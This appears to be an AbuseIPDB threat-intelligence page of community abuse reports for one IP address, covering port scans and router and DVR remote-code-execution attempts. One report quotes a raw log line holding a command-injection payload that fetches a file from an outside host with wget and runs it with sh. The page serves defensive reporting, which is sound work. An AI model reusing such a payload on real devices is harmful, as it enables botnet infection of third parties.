JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 14.1.91.96

14.1.91.96 was found in our database!

This IP was reported 16 times. Confidence of Abuse is 84%: ?

84%

ISP	SpaceX Services, Inc.
Usage Type	Fixed Line ISP
ASN	AS14593
Hostname(s)	customer.mnlaphl1.isp.starlink.com
Domain Name	spacex.com
Country	🇫🇲 Micronesia (Federated States of)
City	Palikir, Pohnpei State

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 14.1.91.96

Whois 14.1.91.96

IP Abuse Reports for 14.1.91.96:

This IP address has been reported a total of 16 times from 15 distinct sources. 14.1.91.96 was first reported on June 2nd 2026, and the most recent report was 1 day ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇫🇮 tjs	2026-06-03 12:40:00 (1 day ago)	web attack	Hacking Web App Attack
Anonymous	2026-06-03 11:25:07 (1 day ago)	CVE-2018-10562 - GPON Remote Code Execution - HTTP (Request)	Hacking
🇺🇸 sumnone	2026-06-03 09:32:40 (1 day ago)	Port probing on unauthorized port 5556	Port Scan Hacking Exploited Host
🇧🇷 SOC PR	2026-06-03 08:44:53 (1 day ago)	IPS: RCE attempt via web shell endpoint with JAWS malware dropper. Attempt to download and execute J ... show more IPS: RCE attempt via web shell endpoint with JAWS malware dropper. Attempt to download and execute JAWS botnet payload. User-Agent: terrabot-owned-you. show less	Web App Attack
🇮🇪 RoboSOC	2026-06-03 07:51:22 (1 day ago)	GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: customer.mnlaphl1.isp.st ... show more GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: customer.mnlaphl1.isp.starlink.com. show less	Hacking
🇨🇭 SOC [GOLINE SA]	2026-06-03 07:08:15 (1 day ago)	IDS Alert: ET WEB_SPECIFIC_APPS MVPower CCTV DVR /shell JAWS Webserver Unauthenticated Remote Comman ... show more IDS Alert: ET WEB_SPECIFIC_APPS MVPower CCTV DVR /shell JAWS Webserver Unauthenticated Remote Command Execution (CVE-2016-20016) === ATTACK === Signature: ET WEB_SPECIFIC_APPS MVPower CCTV DVR /shell JAWS Webserver Unauthenticated Remote Command Execution (CVE-2016-20016) \| SID: 2030092 \| Severity: 1 \| Category: Web Application Attack === SOURCE === IP: 14.1.91.96 (IPv4) \| Port: 27921 \| Country: Federated States of Micronesia \| ISP: STARLINK_TKYOJPN1_JP \| rDNS: customer.mnlaphl1.isp.starlink.com === TARGET === Host: nextcloud.goline.ch \| IP: 185.54.81.37 \| Port: 80 \| Protocol: TCP \| App: http === RESPONSE === Time: 2026-06-03 07:08:14 \| Action: Blocked show less	Web App Attack Hacking
🇺🇸 gu-alvareza	2026-06-03 07:05:29 (2 days ago)	JAWS.DVR.CCTV.Shell.Unauthenticated.Command.Execution	Hacking Web App Attack
🇩🇪 celestialcity	2026-06-03 06:25:16 (2 days ago)	Blocked by UFW on celestialcityeu [443/tcp] \| SPT: 62670 \| TTL: 54 \| LEN: 40 \| TOS: 0x00 • Reported ... show more Blocked by UFW on celestialcityeu [443/tcp] \| SPT: 62670 \| TTL: 54 \| LEN: 40 \| TOS: 0x00 • Reported by: github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇫🇷 GoodOldTOS	2026-06-03 06:05:19 (2 days ago)	Bad keywords detected in request: /shell?	Web App Attack
🇺🇸 MPL	2026-06-03 05:42:28 (2 days ago)	tcp/5554 (2 or more attempts)	Port Scan
🇦🇺 dyln	2026-06-03 05:41:31 (2 days ago)	Dyls honeypot brute-force: proto8 (1 total hits)	Brute-Force
🇺🇸 xmission.com	2026-06-03 02:55:16 (2 days ago)	Blocked by UFW (TCP on 80) Source port: 19625 TTL: 43 Packet length: 40 TOS: 0x08 This report (for ... show more Blocked by UFW (TCP on 80) Source port: 19625 TTL: 43 Packet length: 40 TOS: 0x08 This report (for 14.1.91.96) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Web App Attack
🇩🇪 strxmpp	2026-06-03 02:43:32 (2 days ago)	14.1.91.96 - - [03/Jun/2026:04:43:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://140.233.190 ... show more 14.1.91.96 - - [03/Jun/2026:04:43:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://140.233.190.47/dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 523 "-" "terrabot-owned-you" ... show less	Bad Web Bot
🇧🇷 chronos	2026-06-03 00:15:38 (2 days ago)	Generic malicious activity: ALERT: External attempt to access critical TCP port... \| Port: 8080 \| Pr ... show more Generic malicious activity: ALERT: External attempt to access critical TCP port... \| Port: 8080 \| Proto: TCP \| Location: Japan, Tokyo show less	Port Scan Hacking
🇺🇸 MPL	2026-06-02 23:50:48 (2 days ago)	tcp/80	Port Scan

Showing 1 to 15 of 16 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇪 213.209.159.11

🇧🇪 198.235.24.234

🇺🇸 147.185.132.148

🇯🇵 92.202.82.102

🇺🇦 85.239.147.15

🇨🇳 1.197.102.62

🇨🇦 192.95.10.204

🇩🇪 179.61.145.113

🇧🇷 177.136.206.71

🇺🇸 136.116.186.200

🇰🇷 115.178.75.243

🇻🇳 103.166.184.148

🇳🇱 91.92.42.136

🇺🇦 82.29.225.114

🇺🇸 66.132.195.121

🇺🇸 66.132.172.221

🇬🇧 45.82.76.139

🇺🇸 34.70.122.164

🇺🇸 34.28.108.22

🇨🇳 221.203.139.105